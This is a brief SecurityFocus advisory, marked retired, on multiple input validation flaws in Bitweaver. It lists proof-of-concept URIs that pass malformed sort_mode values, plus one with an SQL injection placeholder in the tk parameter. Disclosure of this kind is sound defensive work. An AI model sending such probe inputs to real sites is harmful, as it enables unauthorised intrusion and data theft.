Retired: Bitweaver Multiple Parameter Multiple Input Validation Vulnerabilities

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/bitweaver/blogs/list_blogs.php?sort_mode=-98
http://www.example.com/bitweaver/fisheye/list_galleries.php?sort_mode=-98
http://www.example.com/bitweaver/fisheye/index.php?sort_mode=-98
http://www.example.com/bitweaver/wiki/orphan_pages.php?sort_mode=-98
http://www.example.com/bitweaver/wiki/list_pages.php?find=&sort_mode=-98
http://www.example.com/bitweaver/newsletters/edition.php?tk=[SQL]&find=1&search=suchen


 

Privacy Statement
Copyright 2010, SecurityFocus